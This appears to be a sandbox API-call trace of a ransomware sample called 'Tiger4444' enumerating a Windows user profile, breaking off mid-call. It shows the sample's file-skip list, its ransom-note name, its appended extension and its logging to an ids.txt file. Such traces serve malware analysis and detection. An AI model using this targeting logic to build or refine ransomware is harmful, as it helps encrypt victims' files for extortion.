[0045.043] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x22) returned 1 [0045.043] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x6) returned 1 [0045.043] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0045.043] lstrlenW (lpString="Tiger4444") returned 9 [0045.043] lstrcmpiW (lpString1="gtrans-ms", lpString2="Tiger4444") returned -1 [0045.043] lstrlenW (lpString=".dll") returned 4 [0045.043] lstrcmpiW (lpString1="s-ms", lpString2=".dll") returned 1 [0045.043] lstrlenW (lpString=".lnk") returned 4 [0045.043] lstrcmpiW (lpString1="s-ms", lpString2=".lnk") returned 1 [0045.044] lstrlenW (lpString=".ini") returned 4 [0045.044] lstrcmpiW (lpString1="s-ms", lpString2=".ini") returned 1 [0045.044] lstrlenW (lpString=".sys") returned 4 [0045.044] lstrcmpiW (lpString1="s-ms", lpString2=".sys") returned 1 [0045.044] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\fd1hvy\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0045.044] GetLastError () returned 0x20 [0045.044] wsprintfA (in: param_1=0x30ad238, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms _CreateFile error 32\r\n") returned 139 [0045.044] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms _CreateFile error 32\r\n") returned 139 [0045.044] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.044] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x74b [0045.044] WriteFile (in: hFile=0x260, lpBuffer=0x30ad238*, nNumberOfBytesToWrite=0x8b, lpNumberOfBytesWritten=0x30abefc, lpOverlapped=0x0 | out: lpBuffer=0x30ad238*, lpNumberOfBytesWritten=0x30abefc*=0x8b, lpOverlapped=0x0) returned 1 [0045.046] CloseHandle (hObject=0x260) returned 1 [0045.047] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.047] CloseHandle (hObject=0x0) returned 0 [0045.047] CloseHandle (hObject=0xffffffff) returned 1 [0045.047] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xc1adea7d, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc1adea7d, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc1adea7d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0045.047] lstrcmpiW (lpString1="ntuser.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.047] lstrcmpiW (lpString1="ntuser.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.047] lstrcmpiW (lpString1="ntuser.ini", lpString2="Tiger4444.exe") returned -1 [0045.047] lstrcmpiW (lpString1="ntuser.ini", lpString2=".") returned 1 [0045.048] lstrcmpiW (lpString1="ntuser.ini", lpString2="..") returned 1 [0045.048] lstrcmpiW (lpString1="ntuser.ini", lpString2="windows") returned -1 [0045.048] lstrcmpiW (lpString1="ntuser.ini", lpString2="bootmgr") returned 1 [0045.048] lstrcmpiW (lpString1="ntuser.ini", lpString2="pagefile.sys") returned -1 [0045.048] lstrcmpiW (lpString1="ntuser.ini", lpString2="boot") returned 1 [0045.048] lstrcmpiW (lpString1="ntuser.ini", lpString2="ids.txt") returned 1 [0045.048] lstrcmpiW (lpString1="ntuser.ini", lpString2="NTUSER.DAT") returned 1 [0045.048] lstrcpyW (in: lpString1=0x30aeac8, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0045.048] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.ini", dwFileAttributes=0x2) returned 1 [0045.048] lstrlenW (lpString="ntuser.ini") returned 10 [0045.048] lstrlenW (lpString="Tiger4444") returned 9 [0045.048] lstrcmpiW (lpString1="tuser.ini", lpString2="Tiger4444") returned 1 [0045.048] lstrlenW (lpString=".dll") returned 4 [0045.048] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.048] lstrlenW (lpString=".lnk") returned 4 [0045.048] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.048] lstrlenW (lpString=".ini") returned 4 [0045.048] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.048] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="Tiger4444.exe") returned -1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2=".") returned 1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="..") returned 1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="windows") returned -1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="bootmgr") returned 1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="pagefile.sys") returned -1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="boot") returned 1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="ids.txt") returned 1 [0045.049] lstrcmpiW (lpString1="OneDrive", lpString2="NTUSER.DAT") returned 1 [0045.049] lstrcpyW (in: lpString1=0x30aeac8, lpString2="OneDrive" | out: lpString1="OneDrive") returned="OneDrive" [0045.049] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\OneDrive", dwFileAttributes=0x10) returned 1 [0045.049] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0045.049] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc72ec8 [0045.049] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66548 [0045.049] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x68756327, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x68756327, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0045.049] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.049] lstrcmpiW (lpString1="Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.049] lstrcmpiW (lpString1="Pictures", lpString2="Tiger4444.exe") returned -1 [0045.049] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0045.049] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0045.050] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0045.050] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0045.050] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0045.050] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0045.050] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0045.050] lstrcmpiW (lpString1="Pictures", lpString2="NTUSER.DAT") returned 1 [0045.050] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0045.050] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures", dwFileAttributes=0x10) returned 1 [0045.050] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0045.050] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc72f08 [0045.050] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66448 | out: ListHead=0xc66828, ListEntry=0xc66448) returned 0xc66528 [0045.050] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="Tiger4444.exe") returned -1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2=".") returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="..") returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="windows") returned -1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="bootmgr") returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="pagefile.sys") returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="boot") returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="ids.txt") returned 1 [0045.050] lstrcmpiW (lpString1="PrintHood", lpString2="NTUSER.DAT") returned 1 [0045.050] lstrcpyW (in: lpString1=0x30aeac8, lpString2="PrintHood" | out: lpString1="PrintHood") returned="PrintHood" [0045.050] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\PrintHood", dwFileAttributes=0x2412) returned 1 [0045.051] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\PrintHood\r\n") returned 44 [0045.051] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\PrintHood\r\n") returned 44 [0045.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.051] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0045.051] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x2c, lpOverlapped=0x0) returned 1 [0045.053] CloseHandle (hObject=0x260) returned 1 [0045.054] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="Tiger4444.exe") returned -1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="bootmgr") returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="pagefile.sys") returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="boot") returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="ids.txt") returned 1 [0045.054] lstrcmpiW (lpString1="Recent", lpString2="NTUSER.DAT") returned 1 [0045.054] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Recent" | out: lpString1="Recent") returned="Recent" [0045.054] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Recent", dwFileAttributes=0x2412) returned 1 [0045.055] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Recent\r\n") returned 41 [0045.055] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Recent\r\n") returned 41 [0045.055] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.055] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x802 [0045.055] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x29, lpOverlapped=0x0) returned 1 [0045.057] CloseHandle (hObject=0x260) returned 1 [0045.058] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="Tiger4444.exe") returned -1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2=".") returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="..") returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="windows") returned -1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="bootmgr") returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="pagefile.sys") returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="boot") returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="ids.txt") returned 1 [0045.058] lstrcmpiW (lpString1="Saved Games", lpString2="NTUSER.DAT") returned 1 [0045.058] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0045.058] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Saved Games", dwFileAttributes=0x10) returned 1 [0045.059] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66560 [0045.059] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x38) returned 0xc73208 [0045.059] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66568 | out: ListHead=0xc66828, ListEntry=0xc66568) returned 0xc66448 [0045.059] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="Tiger4444.exe") returned -1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2=".") returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="..") returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="windows") returned -1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="bootmgr") returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="pagefile.sys") returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="boot") returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="ids.txt") returned 1 [0045.059] lstrcmpiW (lpString1="Searches", lpString2="NTUSER.DAT") returned 1 [0045.059] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0045.059] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Searches", dwFileAttributes=0x10) returned 1 [0045.060] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0045.060] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc72f48 [0045.060] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66568 [0045.060] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="Tiger4444.exe") returned -1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="windows") returned -1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="bootmgr") returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="pagefile.sys") returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="boot") returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="ids.txt") returned 1 [0045.060] lstrcmpiW (lpString1="SendTo", lpString2="NTUSER.DAT") returned 1 [0045.060] lstrcpyW (in: lpString1=0x30aeac8, lpString2="SendTo" | out: lpString1="SendTo") returned="SendTo" [0045.060] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\SendTo", dwFileAttributes=0x2412) returned 1 [0045.060] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\SendTo\r\n") returned 41 [0045.060] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\SendTo\r\n") returned 41 [0045.060] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.061] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x82b [0045.061] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x29, lpOverlapped=0x0) returned 1 [0045.062] CloseHandle (hObject=0x260) returned 1 [0045.063] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0045.063] lstrcmpiW (lpString1="Start Menu", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.063] lstrcmpiW (lpString1="Start Menu", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.063] lstrcmpiW (lpString1="Start Menu", lpString2="Tiger4444.exe") returned -1 [0045.063] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0045.064] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0045.064] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0045.064] lstrcmpiW (lpString1="Start Menu", lpString2="bootmgr") returned 1 [0045.064] lstrcmpiW (lpString1="Start Menu", lpString2="pagefile.sys") returned 1 [0045.064] lstrcmpiW (lpString1="Start Menu", lpString2="boot") returned 1 [0045.064] lstrcmpiW (lpString1="Start Menu", lpString2="ids.txt") returned 1 [0045.064] lstrcmpiW (lpString1="Start Menu", lpString2="NTUSER.DAT") returned 1 [0045.064] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Start Menu" | out: lpString1="Start Menu") returned="Start Menu" [0045.064] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Start Menu", dwFileAttributes=0x2412) returned 1 [0045.064] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Start Menu\r\n") returned 45 [0045.064] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Start Menu\r\n") returned 45 [0045.064] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.064] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x854 [0045.064] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x2d, lpOverlapped=0x0) returned 1 [0045.066] CloseHandle (hObject=0x260) returned 1 [0045.067] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="Tiger4444.exe") returned -1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="bootmgr") returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="pagefile.sys") returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="boot") returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="ids.txt") returned 1 [0045.068] lstrcmpiW (lpString1="Templates", lpString2="NTUSER.DAT") returned 1 [0045.068] lstrcpyW (in: lpString1=0x30aeac8, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0045.068] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Templates", dwFileAttributes=0x2412) returned 1 [0045.068] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Templates\r\n") returned 44 [0045.068] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Templates\r\n") returned 44 [0045.068] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.068] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x881 [0045.069] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x2c, lpOverlapped=0x0) returned 1 [0045.070] CloseHandle (hObject=0x260) returned 1 [0045.071] FindNextFileW (in: 